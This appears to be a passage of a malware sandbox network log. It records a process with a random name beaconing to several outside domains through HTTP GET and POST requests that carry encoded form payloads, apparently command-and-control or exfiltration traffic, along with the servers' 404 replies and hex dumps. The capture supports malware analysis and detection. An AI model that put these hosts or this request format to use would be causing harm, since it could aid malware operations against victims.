                                                                              Date: Sat, 11 Jan 2025 08:28:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 910
                                                                              Connection: close
                                                                              FAI-W-FLOW: 575887038
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              FAI-W-AGENT_AID: 32663896
                                                                              Update-Time: 1736399500
                                                                              Src-Update: true
                                                                              P3P: CP=CAO PSA OUR
                                                                              Origin-Agent-Cluster: ?0
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Download-Options: noopen
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: _cliid=uwad7gHnuwC5boAu; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 08:28:11 GMT; HttpOnly
                                                                              Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 08:28:11 GMT; HttpOnly
                                                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <
                                                                              Jan 11, 2025 09:28:11.490329027 CET425INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c
                                                                              Data Ascii: div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="ba


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.849889165.154.96.210803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:13.070921898 CET377OUTGET /t322/?DzLTc=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.yunlekeji.top
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:28:14.008352995 CET1236INHTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Connection: close
                                                                              Date: Sat, 11 Jan 2025 08:28:08 GMT
                                                                              Content-Length: 910
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Download-Options: noopen
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Cache-Flow: 1316037755
                                                                              Origin-Agent-Cluster: ?0
                                                                              FAI-W-FLOW: 576032038
                                                                              FAI-W-AGENT-AID: 32663896
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              P3P: CP=CAO PSA OUR
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              Server: F-WEB
                                                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="back" style="margin
                                                                              Jan 11, 2025 09:28:14.008491993 CET165INData Raw: 2d 6c 65 66 74 3a 20 30 70 78 3b 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 54 78 74 22 3e e8 bf 94 e5 9b 9e e9 a6
                                                                              Data Ascii: -left: 0px;"><div class="backImg"></div><span class="backTxt"></span></div></a></div></div> </div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.84992845.141.156.114803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:19.075870991 CET631OUTPOST /iuvu/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.logidant.xyz
                                                                              Origin: http://www.logidant.xyz
                                                                              Referer: http://www.logidant.xyz/iuvu/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 42 43 46 56 41 62 61 56 7a 4d 77 55 55 67 6f 7a 32 74 74 74 32 7a 32 35 53 35 33 32 51 62 39 6b 4c 47 42 56 48 45 3d
                                                                              Data Ascii: DzLTc=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3BCFVAbaVzMwUUgoz2ttt2z25S532Qb9kLGBVHE=
                                                                              Jan 11, 2025 09:28:19.760360956 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:19 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.84994445.141.156.114803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:21.621465921 CET651OUTPOST /iuvu/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.logidant.xyz
                                                                              Origin: http://www.logidant.xyz
                                                                              Referer: http://www.logidant.xyz/iuvu/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 62 64 35 52 52 42 7a 6e 47 56 2b 6f 57 78 4c 51 51 4b 54 34 4a 74 48 38 54 57 49 54 7a 41 6b 36 4b 61 50 59 46 55
                                                                              Data Ascii: DzLTc=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2bd5RRBznGV+oWxLQQKT4JtH8TWITzAk6KaPYFU
                                                                              Jan 11, 2025 09:28:22.302723885 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:22 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.84996445.141.156.114803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:24.169318914 CET1668OUTPOST /iuvu/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.logidant.xyz
                                                                              Origin: http://www.logidant.xyz
                                                                              Referer: http://www.logidant.xyz/iuvu/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 41 31 7a 77 48 4c 7a 38 44 35 52 79 31 69 61 38 4a 71 45 4e 6a 41 51 51 59 74 2b 48 63 66 34 4d 6c 43 38 6d 2b 4f 7a 4c 74 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 61 34 76 71 31 47 4e 67 74 49 32 73 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a 51 6f [TRUNCATED]
                                                                              Data Ascii: DzLTc=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cEsKYD0B5A1zwHLz8D5Ry1ia8JqENjAQQYt+Hcf4MlC8m+OzLtoFZi2FU0E60Cl9TlTM5K++VPxeaj9S4kTKinkKjPnnoOS/n0SRK7ba0CbiXAd4a4vq1GNgtI2sZi8tl9P+0w3OvpKxmcikB1zv2/tT18nfAaJIkJQo0xywPUAF2J+bw3aSn8/suMT4v+H7JbiywjYUN8COYgT2FbUMC+/uCwYPynE7p34GXEa9Uuz0PPxrzuUCaIO5wCKz9DA85F36xdyBTBPZobdnwEcuI6EQz+8hoso2aE+hhG0/Cy2rdoEQ+nO9gSWJLGfXkBQO7mGLiFhu3c8dJrEGhFVfv5OxDunHUU44VS90k6IQgNx0FHPY3QjLvKwk41Smvik3dgqBplEFn4+v6TzVZY51rh+WG7Zaj13/fz/1hKc8BPx7JP6hB/dyAZE/st/O3Q3+i079qggMDI6xvNtcnNv+pqATyq34qZ/OIQZ0AP7I+lfXRJAyEjKpXdZEXaIHc/40nAEvXJTzsgJbjik84t0GZhbNW9KP/4iqvFyENloxFT0t4zRrJwJ9NdgTidGbxXSxTeZNJRtq69Dm/whPxj5dWl6ezFCqNtZQQO1CpUwO1xnO7uXjIf9zWsUbIXOeFxEk8krUYTSczrEup5iQFtCzROQNmmbZoUIVfJjO3uf4NE+wIpzeeo5Oi7DMq0NgMsntPKBRvmT4VsRTjfhTV6Lx/pkuhdL42+RbtyymRwEECFMIg/p/Bfw697olKjjy6Wwq4Me+dmtF4UTXE8SDr2KiBLd09yebBHDNUbCmsSPMgze6/QypIflmi1rwLCsCvO2OLWBFMT [TRUNCATED]
                                                                              Jan 11, 2025 09:28:24.867408991 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:24 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.84998145.141.156.114803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:26.711121082 CET376OUTGET /iuvu/?DzLTc=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.logidant.xyz
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:28:27.387038946 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.849998202.79.161.151803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:32.962888002 CET631OUTPOST /36be/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.laohub10.net
                                                                              Origin: http://www.laohub10.net
                                                                              Referer: http://www.laohub10.net/36be/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 58 73 31 70 71 51 52 6d 4d 61 70 2b 75 73 45 31 64 4b 70 62 4b 31 79 61 43 77 74 5a 47 30 7a 36 75 61 44 70 78 55 3d
                                                                              Data Ascii: DzLTc=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTOXs1pqQRmMap+usE1dKpbK1yaCwtZG0z6uaDpxU=
